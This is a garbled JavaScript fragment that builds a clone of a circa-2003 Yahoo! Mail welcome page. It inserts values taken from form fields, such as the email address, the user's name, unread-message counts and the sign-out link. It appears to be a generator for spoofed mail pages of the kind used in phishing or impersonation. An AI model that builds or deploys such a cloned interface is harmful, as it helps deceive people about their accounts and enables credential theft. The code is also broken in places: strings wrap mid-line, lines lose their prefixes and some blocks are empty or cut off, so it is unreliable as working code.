clrar.value+=" var newWin=null;\n"
clrar.value+=" var onscreen=false;\n\n"
clrar.value+=" function NewWin(url,name,xpos,ypos,width,height)\n"
clrar.value+=" {\n"
clrar.value+=" newWin=window.open(\n"
clrar.value+=" url,\n"
clrar.value+=" name,\n"
clrar.value+="
"+K+"screenX="+K+"+xpos+"+K+",screenY="+K+"+ypos+"+K+",WIDTH="+K+"+
width+"+K+",HEIGHT="+K+"+height+"+K+",location=0,resizable=1,status=0,titleb
ar=1,directories=0,toolbar=0,menubar=0,scrollbars=0,status=0"+K+"\n"
clrar.value+=" );\n"
clrar.value+=" newWin.focus();\n"
clrar.value+=" onscreen=true; \n"
clrar.value+=" }\n"
clrar.value+="</"+F+"CRIPT>\n"
clrar.value+="<TD></TD><TD></TD>\n"
clrar.value+="<META content="+K+"Microsoft FrontPage 5.0"+K+"
name=GENERATOR></HEAD>\n"
clrar.value+="<BODY vLink=#0000ff link=#0000ff bgColor=white leftMargin=4
topMargin=4 \n"
clrar.value+="marginheight="+K+"4"+K+" marginwidth="+K+"4"+K+">\n"
clrar.value+="<script>\n"
clrar.value+=" function Help(link)\n"
clrar.value+=" {\n"
clrar.value+="
window.open(link,"+K+"help"+K+","+K+"width=400,height=500,scrollbars=yes,dep
endent=yes"+K+");\n"
clrar.value+=" }\n"
clrar.value+=" if (document.cookie != "+K+""+K+" &&
document.cookie.indexOf("+K+"19AC/A"+K+") == -1) {\n"
clrar.value+=" window.open("+K+"http://mail.yahoo.com"+K+",
"+K+"_top"+K+");\n"
clrar.value+=" }\n"
clrar.value+="</"+F+"CRIPT>\n"
clrar.value+="<!-- begin search masthead -->\n"
clrar.value+="<DIV style="+K+"MARGIN-TOP: -4px"+K+">\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR bgColor=#dcdcdc>\n"
clrar.value+=" <TD noWrap colSpan=2 height=4><SPACER height="+K+"1"+K+"
width="+K+"1"+K+" \n"
clrar.value+=" type="+K+"block"+K+"></TD></TR>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD width="+K+"99%"+K+">\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD noWrap colSpan=3 height=3><SPACER height="+K+"1"+K+"
width="+K+"1"+K+" \n"
clrar.value+=" type="+K+"block"+K+"></TD></TR>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://mail.yahoo.com/"+K+"><IMG height=34
\n"
clrar.value+=" alt="+K+"Yahoo! Mail"+K+" \n"
clrar.value+=" src="+K+"mailma1.gif"+K+" \n"
clrar.value+=" width=250 border=0></A> </TD>\n"
clrar.value+=" <TD noWrap><FONT face=arial size=-1><A \n"
clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/pimnav/welcome/?
http://www.yahoo.com"+K+">Yahoo!</A> \n"
clrar.value+=" - <A \n"
clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/pimnav/welcome/?
http://my.yahoo.com"+K+">My \n"
clrar.value+=" Yahoo!</A> - <A \n"
clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/help/?
http://help.yahoo.com/help/us/mail"+K+">Help</A> \n"
clrar.value+=" </FONT> </TD>\n"
clrar.value+=" <TD align=right>\n"
clrar.value+=" <script language=JavaScript>\n"
clrar.value+="var pb_target="+K+"_blank"+K+";\n"
clrar.value+="var pb_URL = new Array();\n"
clrar.value+="pb_URL[1]="+K+"http://rd.yahoo.com/M=243098.2891634.4238018.
1284474/D=mail/S=150500014:PB/A=1579788/R=0/id=flashurl/SIG=18a42jaeu/*h
ttp://shop.store.yahoo.com/cgi-bin/clink?
hp3+shopping:dmad/M=243098.2891634.4238018.1284474/D=mail/S=150500014:
PB/A=1579788/R=1/1057492859+http://us.rmi.yahoo.com/rmi/http://www.compaq
.com/rmi-framed-url/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+";\n"
clrar.value+="var
pb_flashfile="+K+"http://us.a1.yimg.com/us.yimg.com/a/1-/flash/hp/pb/pbhp_84x2
8_blu_yahoomail.swf"+K+";\n"
clrar.value+="var
pb_altURL="+K+"http://rd.yahoo.com/M=243098.2891634.4238018.1284474/D=m
ail/S=150500014:PB/A=1579788/R=2/id=altimgurl/SIG=18a6fp7oj/*http://shop.sto
re.yahoo.com/cgi-bin/clink?
hp3+shopping:dmad/M=243098.2891634.4238018.1284474/D=mail/S=150500014:
PB/A=1579788/R=3/1057492859+http://us.rmi.yahoo.com/rmi/http://www.compaq
.com/rmi-framed-url/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+";\n"
clrar.value+="var
pb_altimg="+K+"http://us.a1.yimg.com/us.yimg.com/a/1-/flash/hp/pb/pbhp_84x28
_blu_yahoo.gif"+K+";\n"
clrar.value+="var pb_width=84;\n"
clrar.value+="var pb_height=28;\n"
clrar.value+="var pb_FitNewWinHeight = new Array;\n"
clrar.value+="var pb_FitNewWinWidth = new Array;\n"
clrar.value+="pb_FitNewWinWidth[1] = 790;\n"
clrar.value+="pb_FitNewWinHeight[1] = 590;\n"
clrar.value+=" </"+F+"CRIPT>\n\n"
clrar.value+=" <script language=JavaScript \n"
clrar.value+=" src="+K+"fs_pb_fitted_072002b.js"+K+">\n"
clrar.value+=" </"+F+"CRIPT>\n"
clrar.value+=" <NOSCRIPT>\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://rd.yahoo.com/M=243098.2891634.4238018.1284474/D=mail/S=
150500014:PB/A=1579788/R=4/id=noscript/SIG=18aib6l1q/*http://shop.store.yah
oo.com/cgi-bin/clink?
hp3+shopping:dmad/M=243098.2891634.4238018.1284474/D=mail/S=150500014:
PB/A=1579788/R=5/1057492859+http://us.rmi.yahoo.com/rmi/http://www.compaq
.com/rmi-framed-url/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+" \n"
clrar.value+=" target=_blank><IMG height=28 \n"
clrar.value+=" src="+K+"pbhp_84x28_blu_yahoo.gif"+K+" \n"
clrar.value+=" width=84
border=0></A></NOSCRIPT></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+="<script language=javascript>\n"
clrar.value+="<!-- \n"
clrar.value+=" function init() \n"
clrar.value+=" { \n"
clrar.value+=" if (oBw.ie||oBw.dom) { \n\n"
clrar.value+="
menus \n"
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
clrar.value+="
function OnLoad()\n"
{\n"
// noop by default\n"
// redefine as needed\n"
}\n"
clrar.value+=" onload=init\n"
clrar.value+=" //-->\n"
clrar.value+="</"+F+"CRIPT>\n\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=0 border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabhi width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=mailTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabhia id=mail1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24
\n"
clrar.value+=" alt="+K+"Yahoo! Mail"+K+" hspace=4 \n"
clrar.value+=" src="+K+"mailbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconmail></A></TD>\n"
clrar.value+=" <TD class=tabhit noWrap><A \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+">Mail</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabhia id=mailBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareMail(); return
ypim_showMenu('mail')"+K+" \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_mail></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=addrTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=addr1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Address Book"+K+" hspace=4 \n"
clrar.value+=" src="+K+"abbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconaddr></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+">Mail</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabhia id=mailBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareMail(); return
ypim_showMenu('mail')"+K+" \n"
clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_mail></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=addrTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=addr1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Address Book"+K+" hspace=4 \n"
clrar.value+=" src="+K+"abbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconaddr></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://address.yahoo.com/yab/us"+K+">Addresses</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabloa id=addrBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareAddr(); return
ypim_showMenu('addr')"+K+" \n"
clrar.value+=" href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG height=24
\n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_addr></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=calTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=cal1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+="<TD><A href="+K+"http://calendar.yahoo.com/"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Calendar"+K+" hspace=4 \n"
clrar.value+=" src="+K+"calbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconcal></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://calendar.yahoo.com/"+K+">Calendar</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabloa id=calBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareCal(); return
ypim_showMenu('cal')"+K+" \n"
clrar.value+=" href="+K+"http://calendar.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_cal></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n"
clrar.value+=" <TABLE id=noteTb cellSpacing=0 cellPadding=0
width="+K+"100%"+K+" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=tabloa id=note1>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD><A href="+K+"http://notepad.yahoo.com/"+K+"><IMG
height=24 \n"
clrar.value+=" alt="+K+"Yahoo! Notepad"+K+" hspace=4 \n"
clrar.value+=" src="+K+"npdbr1.gif"+K+" \n"
clrar.value+=" width=24 border=0 name=iconnote></A></TD>\n"
clrar.value+=" <TD class=tablot noWrap><A \n"
clrar.value+=" href="+K+"http://notepad.yahoo.com/"+K+">Notepad</A>
</TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabloa id=noteBtn vAlign=center><A \n"
clrar.value+=" onclick="+K+"ypim_prepareNote(); return
ypim_showMenu('note')"+K+" \n"
clrar.value+=" href="+K+"http://notepad.yahoo.com/"+K+"><IMG height=24 \n"
clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n"
clrar.value+=" border=0
name=arr_note></A></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=tabnone align=right
width="+K+"95%"+K+"><B>"+b1.value+"@yahoo.com</B> [<A \n"
clrar.value+=" href="+K+""+b3.value+""+K+">Sign \n"
clrar.value+=" Out</A>] </TD></TR></TBODY></TABLE>\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
150500014:SW4/A=1642781/R=1/SIG=12hdrnou3/*http://www.gotomypc.com/u/tr
/yh/cpm/mail/SW4/25chtext10/PC?Target=mm/g22lp.tmpl"+K+" \n"
clrar.value+=" target=_blank><FONT size=2>Access Your Office <BR>Files from \n"
clrar.value+=" Home</FONT></A> \n"
clrar.value+=" </TD></TR></TBODY></TABLE><!--X-></P></TD></TR></TBODY></TABLE></TD>\n"
clrar.value+=" <TD class=bgd width=8 bgColor=#9bbad6><IMG height=2 \n"
clrar.value+=" src="+K+"space.gif"+K+" width=8></TD>\n"
clrar.value+=" <TD vAlign=top>\n"
clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD bgColor=white>\n"
clrar.value+=" <DIV class=bgd style="+K+"WIDTH: 5px; HEIGHT: 5px"+K+"><IMG
height=5 \n"
clrar.value+=" src="+K+"rdul1.gif"+K+" \n"
clrar.value+=" width=5></DIV></TD></TR></TBODY></TABLE>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
bgColor=white border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD vAlign=top>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD class=mtitle colSpan=2>Welcome, "+b7.value+"
</TD></TR>\n"
clrar.value+=" <TR vAlign=top>\n"
clrar.value+=" <TD align=middle width=28><IMG height=18 \n"
clrar.value+=" src="+K+"newmail1.gif"+K+" \n"
clrar.value+=" width=28> </TD>\n"
clrar.value+=" <TD vAlign=top>You have <B>"+b6.value+" unread
messages</B>:<BR><B><A \n"
clrar.value+=" href="+K+""+b2.value+""+K+">Inbox
("+b4.value+")</A></B>, \n"
clrar.value+=" <B><A \n"
clrar.value+=" href="+K+""+b2.value+""+K+">Bulk
("+b5.value+")</A></B> \n"
clrar.value+=" </TD></TR>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD colSpan=2 height=5><IMG height=5 \n"
clrar.value+=" src="+K+"space.gif"+K+" \n"
clrar.value+=" width=1></TD></TR></TBODY></TABLE>\n"
clrar.value+=" <TABLE cellSpacing=6 cellPadding=0 border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD vAlign=top><IMG height=16 \n"
clrar.value+=" src="+K+"bulb1.gif"+K+" \n"
clrar.value+=" width=16> </TD>\n"
clrar.value+=" <TD><B>Today's tip: </B>Before you click "+K+"Send,"+K+" ask
yourself \n"
clrar.value+=" if each and every recipient will want to read your \n"
clrar.value+=" email.</TD></TR></TBODY></TABLE>\n"
clrar.value+=" <CENTER>\n"
clrar.value+=" <DIV class=bgd style="+K+"MARGIN: 8px; WIDTH: 90%; HEIGHT:
1px"+K+"><SPACER \n"
clrar.value+=" height="+K+"1"+K+" width="+K+"1"+K+"
type="+K+"block"+K+"></DIV></CENTER>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <TD>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" \n"
clrar.value+=" bgColor=#ffffff border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+="<TD width=68><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8754/*http://mailplus.m
ail.yahoo.com/mp_splash_launch.php?b=lv"+K+" \n"
clrar.value+=" target=_blank><IMG height=60 \n"
clrar.value+=" src="+K+"sp_storage60_1.gif"+K+" \n"
clrar.value+=" width=68 border=0></A></TD>\n"
clrar.value+=" <TD noWrap> </TD>\n"
clrar.value+=" <TD vAlign=top><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8754/*http://mailplus.m
ail.yahoo.com/mp_splash_launch.php?b=lv"+K+" \n"
clrar.value+=" target=_blank><IMG height=18 \n"
clrar.value+=" src="+K+"hd_storage_1.gif"+K+" \n"
clrar.value+=" width=220 vspace=3 border=0></A><BR>For those of you who \n"
clrar.value+=" can't throw anything away. <NOBR><B><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8754/*http://mailplus.m
ail.yahoo.com/mp_splash_launch.php?b=lv"+K+" \n"
clrar.value+=" target=_blank>Learn \n"
clrar.value+=" more</A></B></NOBR></TD></TR></TBODY></TABLE><BR>\n"
clrar.value+=" <TABLE cellSpacing=0 cellPadding=1 width=300 bgColor=#057ebc
\n"
clrar.value+=" border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR>\n"
clrar.value+=" <FORM style="+K+"MARGIN-TOP: 0px; MARGIN-BOTTOM:
0px"+K+" \n"
clrar.value+="
action=http://pa.yahoo.com/*http://rd.yahoo.com/personals/ext/evt=8120/*http://
personals.yahoo.com/display \n"
clrar.value+=" target=_blank><INPUT type=hidden value=mantle \n"
clrar.value+=" name=frommod><INPUT type=hidden value=table \n"
clrar.value+=" name=ct_hft><INPUT type=hidden value=-dregion- \n"
clrar.value+=" name=cr><INPUT type=hidden value=2 name=advs><INPUT \n"
clrar.value+=" type=hidden value=1 name=form><INPUT type=hidden value=0 \n"
border=0>\n"
clrar.value+=" <TBODY>\n"
clrar.value+=" <TR vAlign=top bgColor=#ffffff>\n"
clrar.value+=" <TD align=middle><FONT face=arial size=-2><A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://address.yahoo.com/"+K+">Addre
ss Book</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://auctions.yahoo.com/"+K+">Aucti
ons</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://autos.yahoo.com/"+K+">Autos</
A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://briefcase.yahoo.com/"+K+">Brief
case</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://calendar.yahoo.com/"+K+">Calen
dar</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://chat.yahoo.com/"+K+">Chat</A
> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://classifieds.yahoo.com/"+K+">Cla
ssifieds</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://finance.yahoo.com/"+K+">Financ
e</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://games.yahoo.com/"+K+">Games
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://geocities.yahoo.com/"+K+">Geoc
ities</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://greetings.yahoo.com/"+K+">Gre
etings</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://groups.yahoo.com/"+K+">Groups
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://health.yahoo.com/"+K+">Health
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://astrology.yahoo.com/yastro/"+K+
">Horoscopes</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://hotjobs.yahoo.com/"+K+">HotJo
bs</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://www.yahooligans.com/"+K+">Kid
s</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://mail.yahoo.com/"+K+">Mail</A>
\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://maps.yahoo.com/"+K+">Maps</
A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://members.yahoo.com/"+K+">Me
mber Directory</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://messenger.yahoo.com/"+K+">Me
ssenger</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://mobile.yahoo.com/"+K+">Mobile
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://movies.yahoo.com/"+K+">Movies
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://launch.yahoo.com/"+K+">Music<
/A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://my.yahoo.com/"+K+">My
Yahoo!</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://news.yahoo.com/"+K+">News</
A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://paydirect.yahoo.com/"+K+">Pay
Direct</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://personals.yahoo.com/"+K+">Pers
onals</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://pets.yahoo.com/"+K+">Pets</A>
\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://photos.yahoo.com/"+K+">Photos
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://platinum.yahoo.com/"+K+">Plati
num</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://shopping.yahoo.com/"+K+">Sho
pping</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://sports.yahoo.com/"+K+">Sports
</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://tv.yahoo.com/"+K+">TV</A>
\n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://travel.yahoo.com/"+K+">Travel<
/A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://weather.yahoo.com/"+K+">Weat
her</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://yp.yahoo.com/"+K+">Yellow&nbs
p;Pages</A> \n"
clrar.value+=" <A \n"
clrar.value+="
href="+K+"http://us.rd.yahoo.com/footer/*http://docs.yahoo.com/docs/family/mor
e.html"+K+">more...</A></FONT></TD></TR></TBODY></TABLE></TD></TR>
</TBODY></TABLE><!-- SpaceID=150500014 loc=FOOT noad -->\n"
clrar.value+="<script language=javascript> var ADFadids =
"+K+"1522466,1522468,1453288,1453290,1579788,1643659,1455139,1657277,16
42781,1642149,1544483,1052425"+K+"; function ADFlaunch() {var w; var
l="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.1958505/D=mail/S=150
500014:FOOT2/A=1052425/R=0/id=adfeedback/SIG=12ecvkvil/*http://promo.yaho
o.com/adfeedback/?
page=150500014:FOOT2&property=mail&adids="+K+"+ADFadids;
w=window.open(l,"+K+"AdFeedbackWin"+K+","+K+"toolbar=no,scrollbars=yes,resi
zable,location=no,height=400,width=640"+K+"); }</"+F+"CRIPT>\n"
clrar.value+="<CENTER><SMALL><BR>Copyright 1994-2003 <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=1/SIG=11n7g195d/*http://rd.yaho
o.com/mail_us/tos/?http://www.yahoo.com"+K+" \n"
clrar.value+="target=_blank>Yahoo!</A> Inc. All rights reserved. <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=2/SIG=1136qnvkg/*http://docs.ya
hoo.com/info/terms/"+K+">Terms \n"
clrar.value+="of Service</A> - <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=3/SIG=11lp7krrc/*http://docs.yah
oo.com/info/copyright/copyright.html"+K+">Copyright \n"
clrar.value+="Policy</A> - <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=4/SIG=11he80eif/*http://docs.yah
oo.com/info/guidelines/mail.html"+K+">Guidelines</A> \n"
clrar.value+="- <A href="+K+"javascript:ADFlaunch()"+K+">Ad
Feedback</A><BR>NOTICE: We collect \n"
clrar.value+="personal information on this site.<BR>To learn more about how we
use your \n"
clrar.value+="information, see our <A \n"
clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=5/SIG=11b5p6lhe/*http://privacy.
yahoo.com/privacy/us/mail/"+K+">Privacy \n"
clrar.value+="Policy</A></SMALL></CENTER>\n"
clrar.value+="<script>\n"
clrar.value+="var ypim_MA_Farm_URL =
"+K+"http://us.f137.mail.yahoo.com"+K+";\n"
clrar.value+="var ypim_AB_URL =
"+K+"http://address.yahoo.com/yab/us"+K+";\n"
clrar.value+="var ypim_CA_URL = "+K+"http://calendar.yahoo.com"+K+";\n"
clrar.value+="var ypim_NP_URL = "+K+"http://notepad.yahoo.com"+K+";\n"
clrar.value+="var ypim_MA_YY = "+K+"128340"+K+";\n"
clrar.value+="var ypim_IMG =
"+K+"http://us.i1.yimg.com/us.yimg.com/i/us/pim"+K+";\n"
clrar.value+="var ypim_Loc = "+K+"us"+K+";\n"
clrar.value+="var ypim_IsCalendarView = false;\n"
clrar.value+="var ypim_IsNotepadView = false;\n"
clrar.value+="var ypim_i18n_CheckMail = "+K+"Check Mail"+K+";\n"
clrar.value+="var ypim_i18n_Compose = "+K+"Compose"+K+";\n"
clrar.value+="var ypim_i18n_Folders = "+K+"Folders"+K+";\n"
clrar.value+="var ypim_i18n_Search = "+K+"Search"+K+";\n"
clrar.value+="var ypim_i18n_Options = "+K+"Options"+K+";\n"
clrar.value+="var ypim_i18n_Help = "+K+"Help"+K+";\n"
clrar.value+="var ypim_i18n_AddContact = "+K+"Add Contact"+K+";\n"
clrar.value+="var ypim_i18n_AddCategory = "+K+"Add Category"+K+";\n"
clrar.value+="var ypim_i18n_AddList = "+K+"Add List"+K+";\n"
clrar.value+="var ypim_i18n_ViewContacts = "+K+"View Contacts"+K+";\n"
clrar.value+="var ypim_i18n_ViewLists = "+K+"View Lists"+K+";\n"
clrar.value+="var ypim_i18n_Quickbuilder = "+K+"Quickbuilder"+K+";\n"
clrar.value+="var ypim_i18n_ImportContacts = "+K+"Import Contacts"+K+";\n"
</p>
</BODY></HTML>
